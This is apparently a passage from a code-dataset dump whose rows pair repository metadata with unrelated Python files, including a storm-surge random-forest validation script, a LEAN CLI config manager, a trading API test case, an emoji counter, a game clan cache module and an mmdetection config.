if c[n] > c[n * 2]:
return []
c[n * 2] -= c[n] if n > 0 else c[n] // 2 # keep half number of zeros to return
return list(c.elements())
|
[
"tlhuang@tlhuang.net"
] |
tlhuang@tlhuang.net
|
4fb8a6613c23a11b15ea041eb6992e6c99f4496a
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/merra_scripts/03_model_fitting/merraRF882/852-tideGauge.py
|
23b76be58b869b4adff4020388a4f358c87eeb26
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465
| 2021-06-25T21:00:44
| 2021-06-25T21:00:44
| 229,080,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,456
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon May 4 15:51:30 2020
This program is designed to validate a Random Forest
model by using the KFOLD method
@author: Michael Tadesse
"""
#import packages
import os
import glob
import numpy as np
import pandas as pd
from sklearn import metrics
from scipy import stats
import seaborn as sns
import matplotlib.pyplot as plt
from datetime import datetime
from sklearn.ensemble import RandomForestRegressor
from sklearn.decomposition import PCA
from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
def validateRF():
"""
run KFOLD method for regression
"""
#defining directories
dir_in = "/lustre/fs0/home/mtadesse/merraAllLagged"
dir_out = "/lustre/fs0/home/mtadesse/merraRFValidation"
surge_path = "/lustre/fs0/home/mtadesse/05_dmax_surge_georef"
#cd to the lagged predictors directory
os.chdir(dir_in)
x = 852
y = 853
#empty dataframe for model validation
df = pd.DataFrame(columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse'])
#looping through
for tg in range(x,y):
os.chdir(dir_in)
#filter only .csv files
tgNames = []
for file in glob.glob("*.csv"):
tgNames.append(file)
tg_name = sorted(tgNames)[tg]
print(tg_name)
##########################################
#check if this tg is already taken care of
##########################################
os.chdir(dir_out)
if os.path.isfile(tg_name):
print("this tide gauge is already taken care of")
return "file already analyzed!"
os.chdir(dir_in)
#load predictor
pred = pd.read_csv(tg_name)
pred.drop('Unnamed: 0', axis = 1, inplace = True)
#add squared and cubed wind terms (as in WPI model)
pickTerms = lambda x: x.startswith('wnd')
wndTerms = pred.columns[list(map(pickTerms, pred.columns))]
wnd_sqr = pred[wndTerms]**2
wnd_cbd = pred[wndTerms]**3
pred = pd.concat([pred, wnd_sqr, wnd_cbd], axis = 1)
#standardize predictor data
dat = pred.iloc[:,1:]
scaler = StandardScaler()
print(scaler.fit(dat))
dat_standardized = pd.DataFrame(scaler.transform(dat), \
columns = dat.columns)
pred_standardized = pd.concat([pred['date'], dat_standardized], axis = 1)
#load surge data
os.chdir(surge_path)
surge = pd.read_csv(tg_name)
surge.drop('Unnamed: 0', axis = 1, inplace = True)
#remove duplicated surge rows
surge.drop(surge[surge['ymd'].duplicated()].index, axis = 0, inplace = True)
surge.reset_index(inplace = True)
surge.drop('index', axis = 1, inplace = True)
#adjust surge time format to match that of pred
time_str = lambda x: str(datetime.strptime(x, '%Y-%m-%d'))
surge_time = pd.DataFrame(list(map(time_str, surge['ymd'])), columns = ['date'])
time_stamp = lambda x: (datetime.strptime(x, '%Y-%m-%d %H:%M:%S'))
surge_new = pd.concat([surge_time, surge[['surge', 'lon', 'lat']]], axis = 1)
#merge predictors and surge to find common time frame
pred_surge = pd.merge(pred_standardized, surge_new.iloc[:,:2], on='date', how='right')
pred_surge.sort_values(by = 'date', inplace = True)
#find rows that have nans and remove them
row_nan = pred_surge[pred_surge.isna().any(axis =1)]
pred_surge.drop(row_nan.index, axis = 0, inplace = True)
pred_surge.reset_index(inplace = True)
pred_surge.drop('index', axis = 1, inplace = True)
#in case pred and surge don't overlap
if pred_surge.shape[0] == 0:
print('-'*80)
print('Predictors and Surge don''t overlap')
print('-'*80)
continue
pred_surge['date'] = pd.DataFrame(list(map(time_stamp, \
pred_surge['date'])), \
columns = ['date'])
#prepare data for training/testing
X = pred_surge.iloc[:,1:-1]
y = pd.DataFrame(pred_surge['surge'])
y = y.reset_index()
y.drop(['index'], axis = 1, inplace = True)
#apply PCA
pca = PCA(.95)
pca.fit(X)
X_pca = pca.transform(X)
#apply 10 fold cross validation
kf = KFold(n_splits=10, random_state=29)
metric_corr = []; metric_rmse = []; #combo = pd.DataFrame(columns = ['pred', 'obs'])
for train_index, test_index in kf.split(X):
X_train, X_test = X_pca[train_index], X_pca[test_index]
y_train, y_test = y['surge'][train_index], y['surge'][test_index]
#train regression model
rf= RandomForestRegressor(n_estimators = 50, random_state = 101, \
min_samples_leaf = 1)
rf.fit(X_train, y_train)
#predictions
predictions = rf.predict(X_test)
# pred_obs = pd.concat([pd.DataFrame(np.array(predictions)), \
# pd.DataFrame(np.array(y_test))], \
# axis = 1)
# pred_obs.columns = ['pred', 'obs']
# combo = pd.concat([combo, pred_obs], axis = 0)
#evaluation matrix - check p value
if stats.pearsonr(y_test, predictions)[1] >= 0.05:
print("insignificant correlation!")
continue
else:
print(stats.pearsonr(y_test, predictions))
metric_corr.append(stats.pearsonr(y_test, predictions)[0])
print(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
print()
metric_rmse.append(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
#number of years used to train/test model
num_years = (pred_surge['date'][pred_surge.shape[0]-1] -\
pred_surge['date'][0]).days/365
longitude = surge['lon'][0]
latitude = surge['lat'][0]
num_pc = X_pca.shape[1] #number of principal components
corr = np.mean(metric_corr)
rmse = np.mean(metric_rmse)
print('num_year = ', num_years, ' num_pc = ', num_pc ,'avg_corr = ',np.mean(metric_corr), ' - avg_rmse (m) = ', \
np.mean(metric_rmse), '\n')
#original size and pca size of matrix added
new_df = pd.DataFrame([tg_name, longitude, latitude, num_years, num_pc, corr, rmse]).T
new_df.columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse']
df = pd.concat([df, new_df], axis = 0)
#save df as cs - in case of interruption
os.chdir(dir_out)
df.to_csv(tg_name)
#run script
validateRF()
|
[
"michaelg.tadesse@gmail.com"
] |
michaelg.tadesse@gmail.com
|
7c254f2c139a62a672f3fceeef3f56306b55cf97
|
1cbcf8660d3ea833b0a9aa3d36fe07839bc5cfc5
|
/apps/commons/__init__.py
|
0f0e0b7adb01e7e6695254fbea30187fca7ed79c
|
[] |
no_license
|
zhanghe06/migration_project
|
f77776969907740494281ac6d7485f35d4765115
|
0264b292873b211bfeca0d645cc41abc9efe883f
|
refs/heads/master
| 2022-12-12T10:55:43.475939
| 2019-09-29T09:19:13
| 2019-09-29T09:19:13
| 185,584,884
| 0
| 1
| null | 2022-12-08T05:04:58
| 2019-05-08T10:31:57
|
Python
|
UTF-8
|
Python
| false
| false
| 251
|
py
|
#!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: __init__.py.py
@time: 2019-04-26 20:06
"""
def func():
pass
class Main(object):
def __init__(self):
pass
if __name__ == '__main__':
pass
|
[
"zhang_he06@163.com"
] |
zhang_he06@163.com
|
4501f26cfb2bffa45db443d6c895bedead0dabe5
|
5ec7d0bad8a77c79843a2813f5effcb3a2b7e288
|
/lean/components/config/cli_config_manager.py
|
39f62229b4180cd6dba56d0480bf199a2f862c96
|
[
"Apache-2.0"
] |
permissive
|
xdpknx/lean-cli
|
aca9b9c9c4e156c9faefcfa8ccdfc20423b510a0
|
c1051bd3e8851ae96f6e84f608a7116b1689c9e9
|
refs/heads/master
| 2023-08-08T02:30:09.827647
| 2021-09-21T21:36:24
| 2021-09-21T21:36:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,050
|
py
|
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.
# Lean CLI v1.0. Copyright 2021 QuantConnect Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Optional
from lean.components.config.storage import Storage
from lean.constants import DEFAULT_ENGINE_IMAGE, DEFAULT_RESEARCH_IMAGE
from lean.models.docker import DockerImage
from lean.models.errors import MoreInfoError
from lean.models.options import ChoiceOption, Option
class CLIConfigManager:
"""The CLIConfigManager class contains all configurable CLI options."""
def __init__(self, general_storage: Storage, credentials_storage: Storage) -> None:
"""Creates a new CLIConfigManager instance.
:param general_storage: the Storage instance for general, non-sensitive options
:param credentials_storage: the Storage instance for credentials
"""
self.user_id = Option("user-id",
"The user id used when making authenticated requests to the QuantConnect API.",
True,
credentials_storage)
self.api_token = Option("api-token",
"The API token used when making authenticated requests to the QuantConnect API.",
True,
credentials_storage)
self.default_language = ChoiceOption("default-language",
"The default language used when creating new projects.",
["python", "csharp"],
False,
general_storage)
self.engine_image = Option("engine-image",
f"The Docker image used when running the LEAN engine ({DEFAULT_ENGINE_IMAGE} if not set).",
False,
general_storage)
self.research_image = Option("research-image",
f"The Docker image used when running the research environment ({DEFAULT_RESEARCH_IMAGE} if not set).",
False,
general_storage)
self.all_options = [
self.user_id,
self.api_token,
self.default_language,
self.engine_image,
self.research_image
]
def get_option_by_key(self, key: str) -> Option:
"""Returns the option matching the given key.
If no option with the given key exists, an error is raised.
:param key: the key to look for
:return: the option having a key equal to the given key
"""
option = next((x for x in self.all_options if x.key == key), None)
if option is None:
raise MoreInfoError(f"There doesn't exist an option with key '{key}'",
"https://www.lean.io/docs/lean-cli/api-reference/lean-config-set#02-Description")
return option
def get_engine_image(self, override: Optional[str] = None) -> DockerImage:
"""Returns the LEAN engine image to use.
:param override: the image name to use, overriding any defaults or previously configured options
:return: the image that should be used when running the LEAN engine
"""
return self._get_image_name(self.engine_image, DEFAULT_ENGINE_IMAGE, override)
def get_research_image(self, override: Optional[str] = None) -> DockerImage:
"""Returns the LEAN research image to use.
:param override: the image name to use, overriding any defaults or previously configured options
:return: the image that should be used when running the research environment
"""
return self._get_image_name(self.research_image, DEFAULT_RESEARCH_IMAGE, override)
def _get_image_name(self, option: Option, default: str, override: Optional[str]) -> DockerImage:
"""Returns the image to use.
:param option: the CLI option that configures the image type
:param override: the image name to use, overriding any defaults or previously configured options
:param default: the default image to use when the option is not set and no override is given
:return: the image to use
"""
if override is not None:
image = override
else:
image = option.get_value(default)
return DockerImage.parse(image)
|
[
"jaspervmerle@gmail.com"
] |
jaspervmerle@gmail.com
|
caab84331a286957688308ab6662f76886565cad
|
d3efc82dfa61fb82e47c82d52c838b38b076084c
|
/Autocase_Result/KZZMM/YW_KZZMM_SHXJ_082.py
|
8be9a19d9eac064c5c1eff466069cccce9c4febe
|
[] |
no_license
|
nantongzyg/xtp_test
|
58ce9f328f62a3ea5904e6ed907a169ef2df9258
|
ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f
|
refs/heads/master
| 2022-11-30T08:57:45.345460
| 2020-07-30T01:43:30
| 2020-07-30T01:43:30
| 280,388,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,053
|
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_KZZMM_SHXJ_082(xtp_test_case):
# YW_KZZMM_SHXJ_082
def test_YW_KZZMM_SHXJ_082(self):
title = '默认3:订单报价未超过涨跌幅限制-沪A限价卖=跌停价'
# 定义当前测试用例的期待值
# 期望状态:初始、未成交、部成、全成、部撤已报、部撤、已报待撤、已撤、废单、撤废、内部撤单
# xtp_ID和cancel_xtpID默认为0,不需要变动
case_goal = {
'期望状态': ['未成交','全成','部成'][trade_type],
'errorID': 0,
'errorMSG': '',
'是否生成报单': '是',
'是否是撤废': '否',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
# 定义委托参数信息------------------------------------------
# 参数:证券代码、市场、证券类型、证券状态、交易状态、买卖方向(B买S卖)、期望状态、Api
stkparm = QueryStkPriceQty('110032', '1', '8', '2', '0', 'S', case_goal['期望状态'], Api)
# 如果下单参数获取失败,则用例失败
if stkparm['返回结果'] is False:
rs = {
'用例测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
self.assertEqual(rs['用例测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_CASH'],
'order_client_id':trade_type + 1,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_LIMIT'],
'price': 100,
'quantity': 200,
'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
CaseParmInsertMysql(case_goal, wt_reqs)
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['用例测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
self.assertEqual(rs['用例测试结果'], True) # 0
if __name__ == '__main__':
unittest.main()
|
[
"418033945@qq.com"
] |
418033945@qq.com
|
a9cfb2037e52211b220afeeb004deb4751481476
|
7fb2fa25c86a824343b6ca0974978db6b12e5590
|
/analysis/count_emojis.py
|
4921e65519970758f36b23edfb37ee5697942392
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
pmichel31415/mtnt
|
ff3d6f509e665c525946dd0635904cb0a3f9766b
|
2a7e9a36b36bd1e95d6d8ab9f28f1d9359240807
|
refs/heads/master
| 2021-04-06T02:25:17.441054
| 2019-04-02T18:13:05
| 2019-04-02T18:13:05
| 125,262,764
| 61
| 7
|
MIT
| 2019-02-26T16:01:56
| 2018-03-14T19:22:44
|
Python
|
UTF-8
|
Python
| false
| false
| 477
|
py
|
#!/usr/bin/python3
"""
Count the number of emojis in the input
"""
import sys
import emoji
import re
txt_emoji_regex = re.compile(r'(8|:|;|=)(\^|\'|-)?(\)|\(|D|P|p)')
utf8_emoji_regex = emoji.get_emoji_regexp()
N = 0
try:
for line in sys.stdin:
for w in line.strip().split():
if txt_emoji_regex.search(w) or utf8_emoji_regex.search(w):
N += 1
except (KeyboardInterrupt, EOFError):
pass
finally:
print(N)
|
[
"pmichel31415@gmail.com"
] |
pmichel31415@gmail.com
|
56aea531c535900df425e4611b4776b282f6fa44
|
46ae8264edb9098c9875d2a0a508bc071201ec8b
|
/res/scripts/client/gui/sharedclancache.py
|
1aa1b48a5532bacd3c62029590bc3c3bcdcd0503
|
[] |
no_license
|
Difrex/wotsdk
|
1fc6156e07e3a5302e6f78eafdea9bec4c897cfb
|
510a34c67b8f4c02168a9830d23f5b00068d155b
|
refs/heads/master
| 2021-01-01T19:12:03.592888
| 2016-10-08T12:06:04
| 2016-10-08T12:06:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,099
|
py
|
# Embedded file name: scripts/client/gui/shared/ClanCache.py
from collections import namedtuple
import BigWorld
from Event import Event
from account_helpers import getAccountDatabaseID
from adisp import async, process
from constants import CLAN_MEMBER_FLAGS
from debug_utils import LOG_ERROR
from helpers import html
from gui.clans.formatters import getClanRoleString
from gui.shared.fortifications.fort_provider import ClientFortProvider
from gui.shared.utils import code2str
from messenger.ext import passCensor
from messenger.proto.events import g_messengerEvents
from messenger.storage import storage_getter
class ClanInfo(namedtuple('ClanInfo', ['clanName',
'clanAbbrev',
'chatChannelDBID',
'memberFlags',
'enteringTime'])):
def getClanName(self):
return self.clanName
def getClanAbbrev(self):
return self.clanAbbrev
def getMembersFlags(self):
return self.memberFlags
def getJoiningTime(self):
return self.enteringTime
class _ClanCache(object):
def __init__(self):
self.__waitForSync = False
self.__fortProvider = None
self.__clanMembersLen = None
self.__clanMotto = ''
self.__clanDescription = ''
self.onSyncStarted = Event()
self.onSyncCompleted = Event()
return
def init(self):
self.__fortProvider = ClientFortProvider()
def fini(self):
self.onSyncStarted.clear()
self.onSyncCompleted.clear()
self.clear()
def onAccountShowGUI(self):
self.__startFortProvider()
def onAvatarBecomePlayer(self):
self.__stopFortProvider()
def onDisconnected(self):
self.__stopFortProvider()
@property
def waitForSync(self):
return self.__waitForSync
@async
def update(self, diff = None, callback = None):
self.__invalidateData(diff, callback)
def clear(self):
self.__fortProvider = None
return
@storage_getter('users')
def usersStorage(self):
return None
@property
def fortProvider(self):
return self.__fortProvider
@property
def clanDBID(self):
from gui.shared import g_itemsCache
return g_itemsCache.items.stats.clanDBID
@property
def isInClan(self):
"""
@return: is current player in clan
"""
return self.clanDBID is not None and self.clanDBID != 0
@property
def clanMembers(self):
members = set()
if self.isInClan:
members = set(self.usersStorage.getClanMembersIterator(False))
return members
@property
def clanInfo(self):
from gui.shared import g_itemsCache
info = g_itemsCache.items.stats.clanInfo
if info and len(info) > 1:
return info
else:
return (None, None, -1, 0, 0)
@property
def clanName(self):
return passCensor(html.escape(self.clanInfo[0]))
@property
def clanAbbrev(self):
return self.clanInfo[1]
@property
def clanMotto(self):
return self.__clanMotto
@property
def clanDescription(self):
return self.__clanDescription
@property
def clanTag(self):
result = self.clanAbbrev
if result:
return '[%s]' % result
return result
@property
def clanCommanderName(self):
for member in self.clanMembers:
if member.getClanRole() == CLAN_MEMBER_FLAGS.LEADER:
return member.getName()
return None
@property
def clanRole(self):
user = self.usersStorage.getUser(getAccountDatabaseID())
if user:
role = user.getClanRole()
else:
role = 0
return role
@property
def isClanLeader(self):
return self.clanRole == CLAN_MEMBER_FLAGS.LEADER
@async
@process
def getClanEmblemID(self, callback):
clanEmblem = None
if self.isInClan:
tID = 'clanInfo' + BigWorld.player().name
clanEmblem = yield self.getClanEmblemTextureID(self.clanDBID, False, tID)
callback(clanEmblem)
return
@async
def getFileFromServer(self, clanId, fileType, callback):
if not BigWorld.player().serverSettings['file_server'].has_key(fileType):
LOG_ERROR("Invalid server's file type: %s" % fileType)
self._valueResponse(0, (None, None), callback)
return None
else:
clan_emblems = BigWorld.player().serverSettings['file_server'][fileType]
BigWorld.player().customFilesCache.get(clan_emblems['url_template'] % clanId, lambda url, file: self._valueResponse(0, (url, file), callback), True)
return None
@async
@process
def getClanEmblemTextureID(self, clanDBID, isBig, textureID, callback):
import imghdr
if clanDBID is not None and clanDBID != 0:
_, clanEmblemFile = yield self.getFileFromServer(clanDBID, 'clan_emblems_small' if not isBig else 'clan_emblems_big')
if clanEmblemFile and imghdr.what(None, clanEmblemFile) is not None:
BigWorld.wg_addTempScaleformTexture(textureID, clanEmblemFile)
callback(textureID)
return
callback(None)
return
def getClanRoleUserString(self):
position = self.clanInfo[3]
return getClanRoleString(position)
def onClanInfoReceived(self, clanDBID, clanName, clanAbbrev, clanMotto, clanDescription):
self.__clanMotto = passCensor(html.escape(clanMotto))
self.__clanDescription = passCensor(html.escape(clanDescription))
def _valueResponse(self, resID, value, callback):
if resID < 0:
LOG_ERROR('[class %s] There is error while getting data from cache: %s[%d]' % (self.__class__.__name__, code2str(resID), resID))
return callback(value)
callback(value)
def _onResync(self):
if not self.__waitForSync:
self.__invalidateData()
def __invalidateData(self, diff = None, callback = lambda *args: None):
if diff is not None:
if 'stats' in diff and 'clanInfo' in diff['stats']:
self.__fortProvider.resetState()
callback(True)
return
def __startFortProvider(self):
self.__clanMembersLen = len(self.clanMembers)
g_messengerEvents.users.onClanMembersListChanged += self.__me_onClanMembersListChanged
self.__fortProvider.start(self)
def __stopFortProvider(self):
self.__clanMembersLen = None
g_messengerEvents.users.onClanMembersListChanged -= self.__me_onClanMembersListChanged
self.__fortProvider.stop()
return
def __me_onClanMembersListChanged(self):
clanMembersLen = len(self.clanMembers)
if self.__clanMembersLen is not None and clanMembersLen != self.__clanMembersLen:
self.__clanMembersLen = clanMembersLen
self.__fortProvider.resetState()
self.__fortProvider.notify('onClanMembersListChanged')
return
g_clanCache = _ClanCache()
|
[
"m4rtijn@gmail.com"
] |
m4rtijn@gmail.com
|
0ce2e5cbbf0829c6f3a636aa81c11c8deda2ed4b
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/dev/cv/detection/YOLOX_ID2833_for_PyTorch/configs/detectors/cascade_rcnn_r50_rfp_1x_coco.py
|
176131d6ee71e712688423706383ed6a3a13e405
|
[
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853
| 2023-07-17T02:48:18
| 2023-07-17T02:48:18
| 483,502,469
| 23
| 6
|
Apache-2.0
| 2022-10-15T09:29:12
| 2022-04-20T04:11:18
|
Python
|
UTF-8
|
Python
| false
| false
| 1,498
|
py
|
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) Open-MMLab. All rights reserved.
_base_ = [
'../_base_/models/cascade_rcnn_r50_fpn.py',
'../_base_/datasets/coco_detection.py',
'../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py'
]
model = dict(
backbone=dict(
type='DetectoRS_ResNet',
conv_cfg=dict(type='ConvAWS'),
output_img=True),
neck=dict(
type='RFP',
rfp_steps=2,
aspp_out_channels=64,
aspp_dilations=(1, 3, 6, 1),
rfp_backbone=dict(
rfp_inplanes=256,
type='DetectoRS_ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
norm_eval=True,
conv_cfg=dict(type='ConvAWS'),
pretrained='torchvision://resnet50',
style='pytorch')))
|
[
"wangjiangben@huawei.com"
] |
wangjiangben@huawei.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.